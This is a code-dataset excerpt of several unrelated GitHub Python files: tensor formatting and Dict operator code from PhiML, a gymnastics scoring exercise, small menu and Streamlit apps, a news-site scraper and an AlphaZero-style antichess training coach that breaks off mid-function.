`layout()` to treat `dict` instances like tensors.\n\n In addition to dictionary functions, supports mathematical operators with other `Dict`s and lookup via `.key` syntax.\n `Dict` implements `phiml.math.magic.PhiTreeNode` so instances can be passed to math operations like `sin`.\n \"\"\"\n\n def __value_attrs__(self):\n return tuple(self.keys())\n \n # --- Dict[key] ---\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError as k:\n raise AttributeError(k)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n def __delattr__(self, key):\n try:\n del self[key]\n except KeyError as k:\n raise AttributeError(k)\n \n # --- operators ---\n \n def __neg__(self):\n return Dict({k: -v for k, v in self.items()})\n \n def __invert__(self):\n return Dict({k: ~v for k, v in self.items()})\n \n def __abs__(self):\n return Dict({k: abs(v) for k, v in self.items()})\n \n def __round__(self, n=None):\n return Dict({k: round(v) for k, v in self.items()})\n\n def __add__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val + other[key] for key, val in self.items()})\n else:\n return Dict({key: val + other for key, val in self.items()})\n\n def __radd__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] + val for key, val in self.items()})\n else:\n return Dict({key: other + val for key, val in self.items()})\n\n def __sub__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val - other[key] for key, val in self.items()})\n else:\n return Dict({key: val - other for key, val in self.items()})\n\n def __rsub__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] - val for key, val in self.items()})\n else:\n return Dict({key: other - val for key, val in self.items()})\n\n def __mul__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val * other[key] for key, val in self.items()})\n else:\n return Dict({key: val * other for key, val in self.items()})\n\n def __rmul__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] * val for key, val in self.items()})\n else:\n return Dict({key: other * val for key, val in self.items()})\n\n def __truediv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val / other[key] for key, val in self.items()})\n else:\n return Dict({key: val / other for key, val in self.items()})\n\n def __rtruediv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] / val for key, val in self.items()})\n else:\n return Dict({key: other / val for key, val in self.items()})\n\n def __floordiv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val // other[key] for key, val in self.items()})\n else:\n return Dict({key: val // other for key, val in self.items()})\n\n def __rfloordiv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] // val for key, val in self.items()})\n else:\n return Dict({key: other // val for key, val in self.items()})\n\n def __pow__(self, power, modulo=None):\n assert modulo is None\n if isinstance(power, Dict):\n return Dict({key: val ** power[key] for key, val in self.items()})\n else:\n return Dict({key: val ** power for key, val in self.items()})\n\n def __rpow__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] ** val for key, val in self.items()})\n else:\n return Dict({key: other ** val for key, val in self.items()})\n\n def __mod__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val % other[key] for key, val in self.items()})\n else:\n return Dict({key: val % other for key, val in self.items()})\n\n def __rmod__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] % val for key, val in self.items()})\n else:\n return Dict({key: other % val for key, val in self.items()})\n\n def __eq__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val == other[key] for key, val in self.items()})\n else:\n return Dict({key: val == other for key, val in self.items()})\n\n def __ne__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val != other[key] for key, val in self.items()})\n else:\n return Dict({key: val != other for key, val in self.items()})\n\n def __lt__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val < other[key] for key, val in self.items()})\n else:\n return Dict({key: val < other for key, val in self.items()})\n\n def __le__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val <= other[key] for key, val in self.items()})\n else:\n return Dict({key: val <= other for key, val in self.items()})\n\n def __gt__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val > other[key] for key, val in self.items()})\n else:\n return Dict({key: val > other for key, val in self.items()})\n\n def __ge__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val >= other[key] for key, val in self.items()})\n else:\n return Dict({key: val >= other for key, val in self.items()})\n\n # --- overridden methods ---\n\n def copy(self):\n return Dict(self)\n\n\ndef to_dict(value: Union[Tensor, Shape]):\n \"\"\"\n Returns a serializable form of a `Tensor` or `Shape`.\n The result can be written to a JSON file, for example.\n\n See Also:\n `from_dict()`.\n\n Args:\n value: `Tensor` or `Shape`\n\n Returns:\n Serializable Python tree of primitives\n \"\"\"\n if isinstance(value, Shape):\n return value._to_dict(include_sizes=True)\n elif isinstance(value, Tensor):\n return value._to_dict()\n raise ValueError(f\"Cannot convert {value} to a dict\")\n\n\ndef from_dict(dict_: dict, convert=False):\n \"\"\"\n Loads a `Tensor` or `Shape` from a serialized form.\n\n See Also:\n `to_dict()`.\n\n Args:\n dict_: Serialized tensor properties.\n convert: Whether to convert the data to the current backend format or keep it as a Numpy array.\n\n Returns:\n `Tensor` or `Shape`.\n \"\"\"\n shape = Shape._from_dict(dict_)\n if 'data' in dict_:\n return tensor(dict_['data'], shape, convert=convert)\n else:\n return shape\n\n\n\n\nclass BroadcastFormatter:\n \"\"\"\n Usage documented in math.__init__.\n\n How it works:\n * -f calls __neg__ which tells tensors to call register_formatted() instead of formatting normally.\n * Then __sub__ is called which maps the actual string formatting.\n \"\"\"\n\n def __init__(self):\n self.values: List[Tensor] = None\n\n def register_formatted(self, value: Tensor, format_spec: str):\n self.values.append(value)\n return \"{\" + f\"{len(self.values) - 1}:{format_spec}\" + \"}\"\n\n def format(self, other: str):\n assert isinstance(other, str), \"math.f must be used on a string\"\n from ._functional import map_\n if self.values is None:\n raise SyntaxError(\"Use the syntax -f-f\\\"{tensor}\\\". Leading '-' is missing.\")\n result = map_(other.format, *self.values)\n self.values = None\n return result\n\n def __sub__(self, other):\n return self.format(other)\n\n def __neg__(self):\n if self.values is not None:\n raise SyntaxError(\"-f called twice without formatting string.\")\n self.values = []\n return self\n\n\nBROADCAST_FORMATTER = BroadcastFormatter()\n\n\n@dataclass\nclass Color:\n name: str\n console_foreground_begin: str\n\n def __call__(self, obj, **kwargs):\n text = str(obj).replace(CONSOLE_END, self.console_foreground_begin)\n return f\"{self.console_foreground_begin}{text}{CONSOLE_END if self.console_foreground_begin else ''}\"\n\n\nDEFAULT = Color(\"Default\", '')\nBLUE = Color(\"Blue\", '\\033[94m')\nGREEN = Color(\"Green\", '\\033[92m')\nYELLOW = Color(\"Yellow\", '\\033[93m')\nGREY = Color(\"Grey\", '\\033[37m')\nCONSOLE_END = '\\033[0m'\n\n\n@dataclass\nclass ColorScheme:\n value: Color\n shape: Color\n dtype: Color\n fine: Color\n\n\nDEFAULT_COLORS = ColorScheme(BLUE, GREEN, YELLOW, GREY)\nNO_COLORS = ColorScheme(DEFAULT, DEFAULT, DEFAULT, DEFAULT)\n\n\n@dataclass\nclass PrintOptions:\n layout: str = 'auto'\n float_format: str = None\n threshold: int = 8\n colors: ColorScheme = None\n include_shape: bool = None\n include_dtype: bool = None\n\n def get_colors(self):\n if self.colors is True:\n return DEFAULT_COLORS\n elif self.colors is False:\n return NO_COLORS\n elif self.colors is not None:\n return self.colors\n else: # None\n return DEFAULT_COLORS if check_is_printing() else NO_COLORS\n\n\ndef check_is_printing():\n import traceback, sys\n stack = traceback.extract_stack()\n for frame in stack:\n if \"_pydevd_bundle\\\\pydevd_xml.py\" in frame.filename or \"_pydevd_bundle/pydevd_xml.py\" in frame.filename:\n return False\n for frame in stack:\n if frame.line.strip().startswith('print('):\n return True\n if 'ipykernel' in sys.modules:\n return True\n return False\n\n\ndef format_summary(self: Tensor, options: PrintOptions) -> str:\n \"\"\"\n Returns shape + dtype + content summary\n\n * `bool`: n / N True\n * `float`: mean ± std (min...max)\n \"\"\"\n if not self.available:\n return format_tracer(self, options)\n from ._sparse import SparseCoordinateTensor, CompressedSparseMatrix\n if isinstance(self, (SparseCoordinateTensor, CompressedSparseMatrix)):\n return sparse_summary(self, options)\n colors = options.get_colors()\n tokens = []\n if self.shape if options.include_shape is None else options.include_shape:\n tokens.append(f\"{colors.shape(self.shape)}\")\n if is_unexpected_dtype(self.dtype) if options.include_dtype is None else options.include_dtype:\n tokens.append(f\"{colors.dtype(self.dtype)}\")\n try:\n if self.rank == 0:\n tokens.append(colors.value(self.numpy()))\n elif self.dtype.kind == bool:\n tokens.append(colors.value(f\"{self.sum} / {self.shape.volume} True\"))\n elif self.dtype.kind in (float, int):\n min_val, max_val, mean, std = [float(f) for f in [self.finite_min, self.finite_max, self.finite_mean, self.std]]\n if std == 0:\n tokens.append(colors.value(f\"const {mean:{options.float_format or ''}}\"))\n else:\n if any([abs(val) < 0.001 or abs(val) > 1000 for val in [mean, std]]):\n tokens.append(colors.value(f\"{mean:{options.float_format or '.2e'}} ± {std:{options.float_format or '.1e'}}\"))\n else:\n tokens.append(colors.value(f\"{mean:{options.float_format or '.3f'}} ± {std:{options.float_format or '.3f'}}\"))\n tokens.append(colors.fine(f\"({min_val:{options.float_format or '.0e'}}...{max_val:{options.float_format or '.0e'}})\"))\n elif self.dtype.kind == complex:\n tokens.append(colors.value(f\"|...| < {abs(self).max}\"))\n except BaseException as err:\n tokens.append(f\"failed to fetch values: {err}\")\n return \" \".join(tokens)\n\n\ndef sparse_summary(value: Tensor, options: PrintOptions) -> str:\n colors = options.get_colors()\n from ._sparse import get_format\n tokens = []\n if is_unexpected_dtype(value.dtype) if options.include_dtype is None else options.include_dtype:\n tokens.append(f\"{colors.dtype(value.dtype)}\")\n tokens.append(\"sparse \" + get_format(value))\n if options.include_shape is not False:\n tokens.append(f\"{colors.shape(value.shape)}\")\n tokens.append(f\"with {instance(value._values).volume} entries:\")\n tokens.append(format_summary(value._values, options))\n return \" \".join(tokens)\n\n\ndef is_unexpected_dtype(dtype: DType):\n if dtype in [DType(bool), DType(int, 32)]:\n return False\n if dtype.kind == float and dtype.precision == get_precision():\n return False\n return True\n\n\ndef format_tracer(self: Tensor, options: PrintOptions) -> str:\n colors = options.get_colors()\n if self._is_tracer:\n return f\"{colors.shape(self.shape)} {colors.dtype(self.dtype)} {colors.value(f'linear tracer for {self.default_backend}')}\"\n else:\n return f\"{colors.shape(self.shape)} {colors.dtype(self.dtype)} {colors.value(f'{self.default_backend} tracer')}\"\n\n\ndef format_full(value: Tensor, options: PrintOptions) -> str: # multi-line content\n if not value.available:\n return format_tracer(value, options)\n from ._sparse import dense\n value = dense(value)\n import re\n colors = options.get_colors()\n dim_order = tuple(sorted(value.shape.spatial.names, reverse=True))\n lines = []\n formatter = {}\n if options.float_format:\n formatter['float_kind'] = ('{:' + options.float_format + '}').format\n with numpy.printoptions(threshold=np.inf, formatter=formatter):\n if value.shape.dual_rank > 0: # matrix\n if options.include_shape is not None:\n lines.append(colors.shape(value.shape))\n if value.shape.dual_rank > 1:\n corresponding_primal = value.shape.only(spatial(','.join(dual(value).names)).names, reorder=True)\n if corresponding_primal:\n value = pack_dims(value, corresponding_primal, corresponding_primal[0].dim_type('&'.join(corresponding_primal.names)))\n value = pack_dims(value, dual, dual('&'.join(value.shape.dual.names)))\n dual_dim = dual(value).name\n primal = dual(value).as_spatial().name\n if primal not in value.shape:\n primal = non_batch(value).non_dual.name\n for b in batch(value).meshgrid(names=True):\n text = \" \" + np.array2string(value[b].numpy([primal, dual_dim]), separator=', ', max_line_width=np.inf) + \" \"\n text = re.sub('[\\\\[\\\\]]', '', text).replace(',', ' ')\n prefixes = prefix_indices(non_batch(value).non_dual, colors)\n if options.include_shape is not False:\n for line, prefix in zip(text.split(\"\\n\"), prefixes):\n lines.append(f\"{prefix} {colors.value(line)} along {colors.shape(dual_dim)}\")\n else:\n lines.append(colors.value(text))\n elif value.shape.spatial_rank == 0: # no spatial or dual dimensions\n if options.include_shape is not None:\n lines.append(colors.shape(value.shape))\n if value.shape.rank <= 1:\n text = np.array2string(value.numpy(), separator=', ', max_line_width=np.inf)\n lines.append(' ' + re.sub('[\\\\[\\\\]]', '', text))\n else:\n text = np.array2string(value.numpy(value.shape), separator=', ', max_line_width=np.inf)\n lines.append(text)\n elif value.shape.spatial_rank in (1, 2):\n if value.shape.non_spatial.volume > 1:\n indices = [f\"{colors.shape(', '.join(f'{name}={idx}' for name, idx in index_dict.items()))}\" for index_dict in value.shape.non_spatial.meshgrid(names=True)]\n max_index_length = max(len(index) for index in indices)\n for i, index_dict in enumerate(value.shape.non_spatial.meshgrid(names=True)):\n row = \"\"\n if value.shape.non_spatial.volume > 1:\n row += indices[i] + \" \" * (max_index_length - len(indices[i]) + 2)\n if value.shape.spatial_rank == 2:\n row += \"\\n\"\n if value.shape.spatial_rank == 1:\n text = np.array2string(value[index_dict].numpy(dim_order), separator=', ', max_line_width=np.inf)\n else:\n text = \" \" + np.array2string(value[index_dict].numpy(dim_order)[::-1], separator=', ', max_line_width=np.inf)\n lines.append(row + colors.value(re.sub('[\\\\[\\\\]]', '', text)) + (f\" along {colors.shape(spatial(value))}\" if options.include_shape is not False else \"\"))\n else:\n raise NotImplementedError('Can only print tensors with up to 2 spatial dimensions.')\n return \"\\n\".join(lines)\n\n\ndef prefix_indices(index_shape, colors: ColorScheme):\n prefixes = [f\"{colors.shape(', '.join(f'{name}={idx}' for name, idx in index_dict.items()))}\" for index_dict in index_shape.meshgrid(names=True)]\n max_len = max(len(p) for p in prefixes)\n prefixes = [p + \" \" * (max_len - len(p) + 2) for p in prefixes]\n return prefixes\n\n\ndef format_row(self: Tensor, options: PrintOptions) -> str: # all values in a single line\n \"\"\"\n Including shape: (x=5, y=4) along vector\n Without shape: (5, 4)\n Auto: don't show if 'vector' but show item names\n\n Args:\n self:\n options:\n\n Returns:\n\n \"\"\"\n if not self.available:\n return format_tracer(self, options)\n from ._sparse import dense\n self = dense(self)\n colors = options.get_colors()\n if self.shape.rank == 1:\n content = _format_vector(self, options)\n is_vector = self.shape.name == 'vector' and self.shape.channel_rank == 1\n is_dual_vector = self.shape.name == '~vector'\n if (not is_vector and not is_dual_vector) if options.include_shape is None else options.include_shape:\n content += f\" along {colors.shape(f'{self.shape.name}{SUPERSCRIPT[self.shape.type]}')}\"\n elif is_dual_vector:\n content = \"~\" + content\n else:\n if channel(self):\n rows = [_format_vector(self[b], options) for b in self.shape.non_channel.meshgrid()]\n else:\n rows = [_format_number(self[b].numpy(), options, self.dtype) for b in self.shape.non_channel.meshgrid()]\n content = \"; \".join(rows)\n if options.include_shape is not False:\n content += \" \" + colors.shape(self.shape)\n if is_unexpected_dtype(self.dtype) if options.include_dtype is None else options.include_dtype:\n content += f\" {colors.dtype(self.dtype)}\"\n return content\n\n\ndef format_numpy(self: Tensor, options: PrintOptions) -> str:\n from ._sparse import dense\n self = dense(self)\n header = []\n colors = options.get_colors()\n if options.include_shape:\n header.append(colors.shape(self.shape))\n if options.include_dtype:\n header.append(colors.dtype(self.dtype))\n numpy_array = self.numpy(self.shape)\n formatter = {}\n if options.float_format:\n formatter['float_kind'] = ('{:' + options.float_format + '}').format\n with numpy.printoptions(threshold=options.threshold, formatter=formatter):\n content = colors.value(numpy_array)\n return \" \".join(header) + \"\\n\" + content if header else content\n\n\ndef _format_vector(self: Tensor, options: PrintOptions) -> str:\n colors = options.get_colors()\n if self.shape.rank > 1:\n from ._magic_ops import flatten\n self = flatten(self, channel('flat'))\n if self.shape.get_item_names(0) is not None and options.include_shape is not False:\n content = \", \".join([f\"{item}={_format_number(number, options, self.dtype)}\" for number, item in zip(self, self.shape.get_item_names(0))])\n else:\n content = \", \".join([_format_number(num, options, self.dtype) for num in self])\n return colors.value(f\"({content})\")\n\n\ndef _format_number(num, options: PrintOptions, dtype: DType):\n if options.float_format is not None:\n return format(num, options.float_format)\n if dtype.kind == int:\n return format(num, 'd')\n if dtype.kind == bool:\n return str(bool(num))\n if dtype.kind == float:\n return format(num, options.float_format or '.3f')\n return str(num)\n\n\ndef format_tensor(self: Tensor, options: PrintOptions) -> str:\n if not self.available:\n return format_tracer(self, options)\n if self.shape.is_non_uniform:\n return f\"{options.get_colors().shape(self.shape)} non-uniform\"\n if options.layout == 'auto':\n if not self.shape:\n return format_summary(self, options)\n if self.shape.volume is not None and self.shape.volume < options.threshold:\n return format_row(self, options)\n else:\n return format_summary(self, options)\n elif options.layout == 'summary':\n return format_summary(self, options)\n elif options.layout == 'full':\n return format_full(self, options)\n elif options.layout == 'row':\n return format_row(self, options)\n elif options.layout == 'numpy':\n return format_numpy(self, options)\n else:\n raise NotImplementedError(f\"Layout '{options.layout}' is not supported.\")\n\n\ndef is_scalar(value) -> bool:\n \"\"\"\n Checks whether `value` has no dimensions.\n\n Args:\n value: `Tensor` or Python primitive or native tensor.\n\n Returns:\n `bool`\n \"\"\"\n if isinstance(value, Tensor):\n return value.shape.rank == 0\n elif isinstance(value, numbers.Number):\n return True\n else:\n return len(choose_backend(value).staticshape(value)) == 0\n\n\ndef variable_shape(value: Tensor):\n return value._native_shape if isinstance(value, NativeTensor) else shape(value)\n\n\ndef may_vary_along(value: Tensor, dims: DimFilter):\n return variable_shape(value).only(dims).volume > 1\n\n\ndef discard_constant_dims(value: Tensor):\n non_variable = value.shape.without(variable_shape(value))\n return value[{dim: 0 for dim in non_variable.names}]\n\n\ndef specs_equal(spec1, spec2):\n if isinstance(spec1, Tensor) or isinstance(spec2, Tensor):\n if isinstance(spec1, Tensor) and isinstance(spec2, Tensor):\n from ._ops import close\n return close(spec1, spec2, rel_tolerance=0, abs_tolerance=0)\n return False\n if isinstance(spec1, dict):\n return set(spec1) == set(spec2) and all([key in spec2 and specs_equal(spec1[key], spec2[key]) for key in spec1.keys()])\n if isinstance(spec1, (tuple, list)):\n return len(spec1) == len(spec2) and all([specs_equal(s1, s2) for s1, s2 in zip(spec1, spec2)])\n return spec1 == spec2\n","repo_name":"tum-pbs/PhiML","sub_path":"phiml/math/_tensors.py","file_name":"_tensors.py","file_ext":"py","file_size_in_byte":109674,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"}
+{"seq_id":"2772527240","text":"while True:\r\n melhor = soma = 0\r\n pior = 15\r\n nome = input('Nome do atleta: ')\r\n if len(nome) == 0:\r\n break\r\n for n in range(0, 7):\r\n nota = float(input('Nota: '))\r\n if nota > melhor:\r\n melhor = nota\r\n if nota < pior:\r\n pior = nota\r\n soma += nota\r\n media = (soma - (melhor + pior)) / 5\r\n print('Resultado final: ')\r\n print(f'Atleta: {nome}\\n'\r\n f'Melhor nota: {melhor}\\n'\r\n f'Pior nota: {pior}\\n'\r\n f'Media: {media}')\r\n","repo_name":"natalinoqueba/exercicios-python","sub_path":"03_EstruturaRepeticao/47_ginastica.py","file_name":"47_ginastica.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74511380561","text":"from views.algorithms.BSM import views_black_scholes_merton\nfrom views.algorithms.ITM import views_in_the_money_calculator\nfrom views.restart import restart\n\n\ndef intro():\n print('ARKADIUS\\nAuthor: Arkadiusz Jaworski\\n\\n')\n\n\ndef tools():\n print('Choose the financial tool to run\\n')\n print('Press 1 for In The Money Algorithm')\n print('Press 2 for Black Scholes Merton Model Algorithm')\n return input('\\nSelect: ')\n\n\ndef main():\n intro()\n tool = tools()\n\n if tool == '1':\n views_in_the_money_calculator()\n elif tool == '2':\n views_black_scholes_merton()\n else:\n restart('That option is invalid.', main)\n\nif __name__ == '__main__':\n main()\n","repo_name":"arkadiuszjaworski98/financial-algorithms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35076957822","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\n\r\nimport home, application, experiment, contact\r\n\r\nst.set_page_config(\r\n page_title = 'Skripsi Web : IDX Clustering',\r\n page_icon = ':bar_chart:'\r\n)\r\n\r\ndef handle_active_page(active_page):\r\n if active_page == 'Home':\r\n home.launch()\r\n elif active_page == 'Application':\r\n application.launch()\r\n elif active_page == 'Experiment':\r\n experiment.launch()\r\n elif active_page == 'Contact':\r\n contact.launch()\r\n\r\nactive_page = option_menu(\r\n menu_title = 'IDX Clustering',\r\n menu_icon = 'info-square',\r\n\r\n options = ['Home', 'Application', 'Experiment', 'Contact'],\r\n icons = ['house', 'gear-wide-connected', 'code-slash', 'globe2'],\r\n\r\n default_index = 1,\r\n orientation = 'horizontal' \r\n)\r\nhandle_active_page(active_page)","repo_name":"kevinsuryapranata/cluster_idx","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19980968178","text":"from bs4 import BeautifulSoup\nimport requests\n\ndef get_thestandard_news():\n #REQUEST FROM THE STANDARD WEBSITE\n r = requests.get('https://thestandard.co/homepage/')\n soup = BeautifulSoup(r.text, 'html.parser')\n \n #SCRAPING TRENDING NEWS : LARGEBOX AND SMALLBOX\n news = soup.find('div',{'class':'col-sm-9 fix-sticky'})\n largebox_news = news.find('div',{'class':'newsbox-large'})\n smallbox_news = news.find_all('div',{'class':'newsbox-small'})\n smallbox_news = smallbox_news[1].find_all('div',{'class':'col-sm-6 col-md-4'}) \n \n #DISPLAY INFORMATION\n category = []\n heading = []\n link = []\n \n #LARGEBOX NEWS\n largecat = largebox_news.find('div',{'class':'caption'}).find('div',{'class':'cat'}).get_text().strip()\n category.append('-' if largecat == '' else largecat)\n heading.append(largebox_news\n .find('div',{'class':'caption'})\n .find('h2',{'class':'news-title'})\n .get_text().strip())\n link.append(largebox_news\n .find('div',{'class':'caption'})\n .find('h2',{'class':'news-title'})\n .find('a').get('href'))\n \n #SMALLBOX NEWS\n for news in smallbox_news:\n smallcat = news.find('div',{'class':'caption'}).find('div',{'class':'cat'}).get_text().strip()\n category.append('-' if smallcat == '' else smallcat)\n heading.append(news.find('div',{'class':'caption'}).find('h2',{'class':'news-title'}).get_text().strip())\n link.append(news.find('div',{'class':'caption'}).find('h2',{'class':'news-title'}).find('a').get('href'))\n\n #DISPLAY \n text = ''\n for i in range(0,7):\n text = text + '{} \\ncategory: {} \\n{} \\n\\n'.format(heading[i], category[i], link[i])\n \n return text.strip()\n","repo_name":"indy041039/indyspaceapp","sub_path":"web_scraping_the_standard.py","file_name":"web_scraping_the_standard.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17921517704","text":"from collections import deque\nfrom Arena import Arena\nimport logging\n\nfrom MCTS import MCTS\nimport numpy as np\nimport time, os\nfrom pickle import Pickler, Unpickler\nimport tensorflow as tf\nimport multiprocessing\nfrom antichess3.pytorch.NNet import NNetWrapper as nn\nfrom utils_multi_proc import *\nfrom antichess3.progress.bar import *\nfrom tqdm import tqdm\nfrom antichess3.Digits import *\nimport datetime\nimport pickle\n\n\nlog = logging.getLogger(__name__)\n\n\ndef AsyncSelfPlay(game,args,iter_num,bar):\n #set gpu\n if(args.multiGPU):\n if(iter_num%2==0):\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n\n #set gpu memory grow\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth=True\n sess = tf.compat.v1.Session(config=config)\n\n #create nn and load weight\n net = nn(game)\n try:\n net.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n pass\n mcts = MCTS(game, net,args,dirichlet_noise=True)\n\n # create a list for store game state\n returnlist = []\n for i in range(args.numPerProcessSelfPlay):\n # Each process play many games, so do not need initial NN every times when process created.\n\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(i=i+1,x=args.numPerProcessSelfPlay,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n trainExamples = []\n board = game.getInitBoard()\n curPlayer = 1\n episodeStep = 0\n\n while True:\n templist = []\n episodeStep += 1\n canonicalBoard = game.getCanonicalForm(board,curPlayer)\n temp = int(episodeStep < args.tempThreshold)\n\n pi = mcts.getActionProb(canonicalBoard, temp=temp)\n sym = game.getSymmetries(canonicalBoard, pi)\n for b,p in sym:\n trainExamples.append([b, curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, curPlayer = game.getNextState(board, curPlayer, action)\n\n r = game.getGameEnded(board, curPlayer)\n\n if r != 0:\n templist.append(list((x[0],x[2],r*((-1)**(x[1]!=curPlayer))) for x in trainExamples))\n returnlist.append(templist)\n break\n\n\n return returnlist\n\ndef AsyncTrainNetwork(game,args,trainhistory):\n #set gpu\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n #create network for training\n nnet = nn(game)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n pass\n\n #---load history file---\n modelFile = os.path.join(args.checkpoint, \"trainhistory.pth.tar\")\n examplesFile = modelFile+\".examples\"\n\n if not os.path.isfile(examplesFile):\n print(examplesFile)\n else:\n print(\"File with trainExamples found. Read it.\")\n #print(examplesFile)\n with open(examplesFile, \"rb\") as f:\n for i in Unpickler(f).load():\n trainhistory.append(i)\n f.closed\n #----------------------\n #---delete if over limit---\n if len(trainhistory) > args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(trainhistory), \" => remove the oldest trainExamples\")\n del trainhistory[len(trainhistory)-1]\n #-------------------\n #---extend history---\n trainExamples = []\n for e in trainhistory:\n trainExamples.extend(e)\n #---save history---\n folder = args.checkpoint\n if not os.path.exists(folder):\n os.makedirs(folder)\n filename = os.path.join(folder, 'trainhistory.pth.tar'+\".examples\")\n with open(filename, \"wb+\") as f:\n Pickler(f).dump(trainhistory)\n f.closed\n #------------------\n nnet.train(trainExamples)\n nnet.save_checkpoint(folder=args.checkpoint, filename='temp.pth.tar')\n\ndef AsyncAgainst(game,args,iter_num,bar):\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(i=iter_num+1,x=args.numAgainstPlayProcess,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n #set gpu\n if(args.multiGPU):\n if(iter_num%2==0):\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n\n #set gpu memory grow\n\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth=True\n sess = tf.compat.v1.Session(config=config)\n\n #create nn and load\n nnet = nn(game)\n pnet = nn(game)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='temp.pth.tar')\n except:\n print(\"load train model fail\")\n pass\n try:\n pnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n print(\"load old model fail\")\n pass\n pmcts = MCTS(game, pnet, args, dirichlet_noise=True)\n nmcts = MCTS(game, nnet, args, dirichlet_noise=True)\n\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), game)\n arena.displayBar = True\n # each against process play the number of numPerProcessAgainst games.\n pwins, nwins, draws = arena.playGames(args.numPerProcessAgainst)\n return pwins, nwins, draws\n\ndef CheckResultAndSaveNetwork(pwins,nwins,draws,game,args,iter_num):\n #set gpu\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n\n if pwins+nwins > 0 and float(nwins+(0.5*draws))/(pwins+nwins+draws) < args.updateThreshold:\n print('REJECTING NEW MODEL')\n net = nn(game)\n net.save_checkpoint(folder=args.checkpoint, filename='checkpoint_' + str(iter_num) + '.pth.tar')\n else:\n print('ACCEPTING NEW MODEL')\n net = nn(game)\n net.load_checkpoint(folder=args.checkpoint, filename='temp.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='checkpoint_' + str(iter_num) + '.pth.tar')\n\nclass Coach():\n \"\"\"\n This class executes the self-play + learning. It uses the functions defined\n in Game and NeuralNet. args are specified in main.py.\n \"\"\"\n def __init__(self, game, args):\n self.game = game\n self.args = args\n self.trainExamplesHistory = []\n\n def parallel_self_play(self):\n pool = multiprocessing.Pool(processes=self.args.numSelfPlayProcess)\n temp = []\n res = []\n result = []\n bar = Bar('Self Play(each process)', max=self.args.numPerProcessSelfPlay)\n\n\n for i in tqdm(range(self.args.numSelfPlayProcess),desc=\"Self Play\"):\n res.append(pool.apply_async(AsyncSelfPlay,args=(self.game,self.args,i,bar,)))\n pool.close()\n pool.join()\n for i in res:\n result.append(i.get())\n for i in result:\n for j in i:\n for trainData in j:\n temp += trainData\n return temp\n\n def parallel_train_network(self,iter_num):\n print(\"Start train network\")\n pool = multiprocessing.Pool(processes=1)\n pool.apply_async(AsyncTrainNetwork,args=(self.game,self.args,self.trainExamplesHistory,))\n pool.close()\n pool.join()\n\n def parallel_self_test_play(self,iter_num):\n pool = multiprocessing.Pool(processes=self.args.numAgainstPlayProcess)\n print(\"Start test play\")\n bar = Bar('Test Play', max=self.args.numAgainstPlayProcess)\n res = []\n result = []\n for i in range(self.args.numAgainstPlayProcess):\n res.append(pool.apply_async(AsyncAgainst,args=(self.game,self.args,i,bar)))\n pool.close()\n pool.join()\n\n pwins = 0\n nwins = 0\n draws = 0\n for i in res:\n result.append(i.get())\n for i in result:\n pwins += i[0]\n nwins += i[1]\n draws += i[2]\n\n print(\"pwin: \"+str(pwins))\n print(\"nwin: \"+str(nwins))\n print(\"draw: \"+str(draws))\n 